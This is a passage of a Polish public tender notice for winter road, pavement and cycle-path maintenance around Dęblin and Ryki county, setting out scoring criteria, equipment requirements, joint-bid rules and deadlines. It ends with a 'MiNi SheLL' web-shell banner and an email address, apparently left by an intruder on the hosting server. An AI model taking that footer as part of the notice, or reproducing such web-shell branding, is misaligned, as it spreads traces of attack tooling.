„cena" Wykonawca może uzyskać maksymalnie 60 pkt.<br/><br/>b)	„Czas reakcji od momentu zgłoszenia” <br/>4.	Czas reakcji należy rozumieć jako wyrażony w minutach maksymalny okres czasu jaki może upłynąć od chwili wydania przez Zamawiającego dyspozycji realizacji usług Zimowego Utrzymania Dróg, a rozpoczęciem wykonywania tych usług przez Wykonawcę.<br/>5.	Zamawiający przyzna Wykonawcy w tym kryterium punkty w następujący:<br/>•	Jeżeli z treści złożonej oferty będzie wynikało, że Wykonawca będzie świadczył usługi stanowiące przedmiot zamówienia, z czasem reakcji Wykonawcy 40 min. – oferta otrzyma 40 pkt.<br/>•	Jeżeli z treści złożonej oferty będzie wynikało, że Wykonawca będzie świadczył usługi stanowiące przedmiot zamówienia, z czasem reakcji Wykonawcy 60 min - oferta otrzyma 20 pkt.<br/>•	Jeżeli z treści złożonej oferty będzie wynikało, że Wykonawca będzie świadczył usługi stanowiące przedmiot zamówienia, z czasem reakcji Wykonawcy 80 min. – oferta otrzyma 0 pkt.<br/>6.	W przypadku braku podania czasu rozpoczęcia akcji od momentu zgłoszenia w ofercie bądź niezgodnego z podanym powyżej kryterium, zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 5) ustawy <br/>7.	Z tytułu kryterium „czas reakcji od momentu zgłoszenia" Wykonawca może uzyskać maksymalnie 40 pkt. <br/>8.	Liczba punktów uzyskanych przez daną ofertę wyliczona będzie wg wzoru:<br/>9.	Ilość punktów = ilość punktów uzyskanych w kryterium „cena”+ ilość punktów uzyskanych w kryterium „czas reakcji od momentu zgłoszenia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji od momentu zgłoszenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.	Zadanie nr 3 - Utrzymanie zimowe dróg, chodników i ścieżek rowerowych na terenie miasta Dęblin <br/>Zakres zadania obejmuje:<br/>•	Zwalczanie śliskości, odśnieżanie dróg, odśnieżanie i zwalczanie śliskości na chodnikach i ścieżkach rowerowych– posypywanie dróg powiatowych, chodników i ścieżek rowerowych, usuwanie śniegu z jezdni, chodników i ścieżek rowerowych dla utrzymania przejezdności oraz ciągłości komunikacyjnej, materiałami wykorzystywanymi do ich posypywania w czasie zimowego utrzymania dróg;<br/>•	Po sezonie zimowym jednorazowe oczyszczenie z materiału uszorstniającego jezdni, chodników ścieżek rowerowych i zatkanych kratek ściekowych wraz z wywozem, <br/>Zadanie wykonać należy za pomocą następującego sprzętu:<br/>•	pługopiaskarki lub pługo-solarki (co najmniej 2 szt.),<br/>•	pługów średnich – pojazd samochodowy lub ciągnik rolniczy (co najmniej 1 szt.). <br/>•	sprzęt do odśnieżania posypywania chodników (co najmniej 1 szt.)<br/>Pługi odśnieżne powinny być w należytym stanie technicznym, mieć równomierny docisk na całej długości oraz gumę dociskową w dobrym stanie.<br/>Zakładana ilość pracy:<br/>•	Likwidacja śliskości na drodze mieszanką piasek-sól do 300 godzin<br/>•	Odśnieżanie nawierzchni jezdni do 200 godzin<br/>•	Odśnieżanie i posypywanie chodników i ścieżek rowerowych do 200 godzin<br/>•	jednorazowe oczyszczenie z materiału uszorstniającego jezdni, chodników, i zatkanych kratek ściekowych wraz z wywozem, po zakończeniu akcji zimowej<br/>Powyższe wielkości stanowią podstawę do kalkulacji cen oferty, z zastrzeżeniem że rzeczywista ilość godzin wykonywania usługi może być różna co uwarunkowane będzie rzeczywistymi warunkami atmosferycznymi.<br/>W przypadku braku możliwości mechanicznego odśnieżenia chodników lub ścieżek rowerowych należy wykonać je siłami własnymi Wykonawcy.<br/>Z uwagi na powyższe Wykonawca musi dysponować potencjałem kadrowym w ilości co najmniej 3 osób odpowiedzialnych za wykonanie odśnieżania i posypywania chodników i ścieżek rowerowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90612000-0 - Usługi zamiatania ulic</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>•	oferta, spełnia wymagania określone niniejszą specyfikacją,<br/>•	oferta została złożona, w określonym przez Zamawiającego terminie,<br/>•	wykonawca przedstawił ofertę zgodną, co do treści z wymaganiami Zamawiającego.<br/>2.	Za najkorzystniejszą zostanie uznana oferta, która w wyniku oceny spełni wszystkie wymogi zawarte w ustawie i SWZ oraz otrzyma najwyższą liczbę punktów.<br/>3. Zamawiający dokona wyboru najkorzystniejszej oferty według następujących kryteriów:<br/>a)	Cena - 60 %<br/>Sposób oceny:<br/>Lp = Cn/Cb x 60% x 100<br/>gdzie:<br/>Lp - liczba punktów<br/>Cn- najniższa cena wśród ofert<br/>Cb - cena badanej oferty<br/><br/>Z tytułu kryterium „cena" Wykonawca może uzyskać maksymalnie 60 pkt.<br/><br/>b)	„Czas reakcji od momentu zgłoszenia” <br/>4.	Czas reakcji należy rozumieć jako wyrażony w minutach maksymalny okres czasu jaki może upłynąć od chwili wydania przez Zamawiającego dyspozycji realizacji usług Zimowego Utrzymania Dróg, a rozpoczęciem wykonywania tych usług przez Wykonawcę.<br/>5.	Zamawiający przyzna Wykonawcy w tym kryterium punkty w następujący:<br/>•	Jeżeli z treści złożonej oferty będzie wynikało, że Wykonawca będzie świadczył usługi stanowiące przedmiot zamówienia, z czasem reakcji Wykonawcy 40 min. – oferta otrzyma 40 pkt.<br/>•	Jeżeli z treści złożonej oferty będzie wynikało, że Wykonawca będzie świadczył usługi stanowiące przedmiot zamówienia, z czasem reakcji Wykonawcy 60 min - oferta otrzyma 20 pkt.<br/>•	Jeżeli z treści złożonej oferty będzie wynikało, że Wykonawca będzie świadczył usługi stanowiące przedmiot zamówienia, z czasem reakcji Wykonawcy 80 min. – oferta otrzyma 0 pkt.<br/>6.	W przypadku braku podania czasu rozpoczęcia akcji od momentu zgłoszenia w ofercie bądź niezgodnego z podanym powyżej kryterium, zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 5) ustawy <br/>7.	Z tytułu kryterium „czas reakcji od momentu zgłoszenia" Wykonawca może uzyskać maksymalnie 40 pkt. <br/>8.	Liczba punktów uzyskanych przez daną ofertę wyliczona będzie wg wzoru:<br/>9.	Ilość punktów = ilość punktów uzyskanych w kryterium „cena”+ ilość punktów uzyskanych w kryterium „czas reakcji od momentu zgłoszenia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji od momentu zgłoszenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.	Zadanie nr 4 – Teren powiatu ryckiego – praca sprzętu ciężkiego <br/>Zakres zadania obejmuje: <br/>Wykorzystanie sprzętu nastąpi w momencie wystąpienia ciężkiej zimy, dużych opadów śniegu w celu odśnieżania ulic, usuwania zasp oraz przywracania przejezdności.<br/>Do wykonania zadania wymaga się następujący sprzęt:<br/>•	równiarka (co najmniej 1 szt.)<br/>•	koparko ładowarka (co najmniej 2 szt.)<br/>•	ładowarka z łyżką co najmniej 3m3 – 1 szt.<br/>Ilość godzin pracy została oszacowana na podstawie poprzedniego sezonu.<br/>Zakładana ilość pracy:<br/>•	Równiarka do 200 godzin<br/>•	Koparko ładowarka do 200 godzin<br/>•	Ładowarka z łyżką co najmniej 3m3	do 150 godzin<br/>Powyższe wielkości stanowią podstawę do kalkulacji cen oferty, z zastrzeżeniem że rzeczywista ilość godzin wykonywania usługi może być różna co uwarunkowane będzie rzeczywistymi warunkami atmosferycznymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>•	oferta, spełnia wymagania określone niniejszą specyfikacją,<br/>•	oferta została złożona, w określonym przez Zamawiającego terminie,<br/>•	wykonawca przedstawił ofertę zgodną, co do treści z wymaganiami Zamawiającego.<br/>2.	Za najkorzystniejszą zostanie uznana oferta, która w wyniku oceny spełni wszystkie wymogi zawarte w ustawie i SWZ oraz otrzyma najwyższą liczbę punktów.<br/>3. Zamawiający dokona wyboru najkorzystniejszej oferty według następujących kryteriów:<br/>a)	Cena - 60 %<br/>Sposób oceny:<br/>Lp = Cn/Cb x 60% x 100<br/>gdzie:<br/>Lp - liczba punktów<br/>Cn- najniższa cena wśród ofert<br/>Cb - cena badanej oferty<br/><br/>Z tytułu kryterium „cena" Wykonawca może uzyskać maksymalnie 60 pkt.<br/><br/>b)	„Czas reakcji od momentu zgłoszenia” <br/>4.	Czas reakcji należy rozumieć jako wyrażony w minutach maksymalny okres czasu jaki może upłynąć od chwili wydania przez Zamawiającego dyspozycji realizacji usług Zimowego Utrzymania Dróg, a rozpoczęciem wykonywania tych usług przez Wykonawcę.<br/>5.	Zamawiający przyzna Wykonawcy w tym kryterium punkty w następujący:<br/>•	Jeżeli z treści złożonej oferty będzie wynikało, że Wykonawca będzie świadczył usługi stanowiące przedmiot zamówienia, z czasem reakcji Wykonawcy 40 min. – oferta otrzyma 40 pkt.<br/>•	Jeżeli z treści złożonej oferty będzie wynikało, że Wykonawca będzie świadczył usługi stanowiące przedmiot zamówienia, z czasem reakcji Wykonawcy 60 min - oferta otrzyma 20 pkt.<br/>•	Jeżeli z treści złożonej oferty będzie wynikało, że Wykonawca będzie świadczył usługi stanowiące przedmiot zamówienia, z czasem reakcji Wykonawcy 80 min. – oferta otrzyma 0 pkt.<br/>6.	W przypadku braku podania czasu rozpoczęcia akcji od momentu zgłoszenia w ofercie bądź niezgodnego z podanym powyżej kryterium, zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 5) ustawy <br/>7.	Z tytułu kryterium „czas reakcji od momentu zgłoszenia" Wykonawca może uzyskać maksymalnie 40 pkt. <br/>8.	Liczba punktów uzyskanych przez daną ofertę wyliczona będzie wg wzoru:<br/>9.	Ilość punktów = ilość punktów uzyskanych w kryterium „cena”+ ilość punktów uzyskanych w kryterium „czas reakcji od momentu zgłoszenia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji od momentu zgłoszenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	Zamawiający wymaga aby Wykonawca posiadał:<br/>a)	Potencjał techniczny:<br/>	Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że posiada:<br/>•	Dla Zadania nr 1 <br/>a)	samochody ciężarowe co najmniej trzyosiowe wraz z ciężkimi pługami oraz piaskarkami lub piaskarko-solarkami (co najmniej 4 szt.)<br/>•	Dla Zadania nr 2 <br/> a) sprzęt do odśnieżania posypywania chodników i ścieżek rowerowych (co najmniej 1 szt.)<br/>•	Zadanie nr 3 <br/>a)	pługopiaskarki lub pługo solarki (co najmniej 2 szt.),<br/>b)	pługów średnich – pojazd samochodowy lub ciągnik rolniczy (co najmniej 1 szt)<br/>c)	sprzęt do odśnieżania posypywania chodników i ścieżek rowerowych (co najmniej 1 szt). <br/>•	Zadanie nr 4 <br/>a)	równiarka co najmniej 1 szt.<br/>b)	koparko ładowarka co najmniej 2 szt.<br/>c)	ładowarka z łyżką co najmniej 3m3 – 1 szt. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Na podstawie art. 274 ust. 1 ustawy Pzp zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie nie krótszym niż 5 dni aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>•	wykaz sprzętu niezbędnego do realizacji przedmiotu zamówienia wraz z informacją o podstawie do dysponowania nim załącznik 4</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> d)	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia z art. 117 ust. 4 – składane tylko w przypadku wspólnego ubiegania się o udzielenie zamówienia np. konsorcjum <br/>e)	Zobowiązanie podmiotu trzeciego lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizującą zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów <br/>pełnomocnictwo<br/>g)	Dokumenty - odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru - z których wynika prawo do podpisania oferty względnie do podpisania innych oświadczeń lub dokumentów składanych wraz z ofertą <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku, o którym mowa powyżej, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>Zamawiający nie może wymagać od wykonawców wspólnie ubiegających się o udzielenie zamówienia posiadania określonej formy prawnej w celu złożenia oferty lub wniosku o dopuszczenie do udziału w postępowaniu.<br/>Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>oświadczenie wstępne o niepodleganiu wykluczeniu stanowiące załącznik 2 do SWZ składają odrębnie każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy <br/>oświadczenie wstępne dotyczące spełnienia warunków udziału w postępowaniu stanowiące załącznik nr 3 do SWZ składają odrębnie:<br/>każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia z art. 117 ust. 4 – składane tylko w przypadku wspólnego ubiegania się o udzielenie zamówienia np. konsorcjum – załącznik nr 10 do SWZ – jeżeli dotyczy. Wykonawcy wspólnie ubiegający się o zamówienie mogą polegać na zdolnościach tych z wykonawców, którzy wykonują usługi do realizacji których te zdolności są wymagane, w takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenia z których wynika które usługi wykonują poszczególni wykonawcy; W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty. Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:<br/>	postępowania o zamówienie publiczne, którego dotyczy,<br/>	wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>	ustanowionego pełnomocnika oraz zakresu jego umocowania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany treści niniejszej umowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności.<br/>2.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z zastrzeżeniem ust. 3.<br/>3.	Zmiany umowy mogą nastąpić w następujących przypadkach:<br/>1)	których mowa w art. 455 ustawy – Prawo zamówień publicznych<br/>2)	zmiany powszechnie obowiązujących przepisów prawa lub wynikających z prawomocnych orzeczeń lub ostatecznych aktów administracyjnych właściwych organów – w takim zakresie, w jakim będzie to niezbędne w celu dostosowania postanowień umowy do zaistniałego stanu prawnego lub faktycznego;<br/>3)	wystąpienia siły wyższej – rozumianą jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. W razie wystąpienia siły wyższej strony umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły wyższej;<br/>4)	dopuszczalna jest zmiana terminu realizacji umowy w przypadku wystąpienia warunków atmosferycznych zmuszających do prowadzenia akcji zimowego utrzymania dróg ponad termin określony w § 2 ust. 1 niniejszej umowy, przy zastrzeżeniu, iż termin realizacji zamówienia ulegnie przedłużeniu nie więcej niż o czas trwania przyczyny powodującej konieczność jego zmiany.<br/>5)	dopuszczalna jest zmiana Wykonawcy - tylko i wyłącznie w przypadku sukcesji generalnej, przekształcenia, dziedziczenia spółek handlowych zgodnie z KSH, sukcesji z mocy prawa;<br/>4.	Wszelkie istotne zmiany i uzupełnienia treści umowy mogą być dokonywane wyłącznie pod rygorem nieważności w formie aneksu podpisanego przez obie strony z zastrzeżeniem ust. 1.<br/>5.	Warunkiem dokonania zmian jest złożenie wniosku przez Stronę inicjującą zmianę,<br/>zawierającego:<br/>•	opis propozycji zmiany <br/>•	uzasadnienie zmiany,<br/>•	opis wpływu zmiany na termin wykonania umowy.<br/>oraz jego akceptacja przez Stronę drugą.<br/>6.	Istotnej zmiany umowy nie stanowi zmiana danych teleadresowych oraz osób wskazanych do kontaktów między stronami umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zdpryki.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-15 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com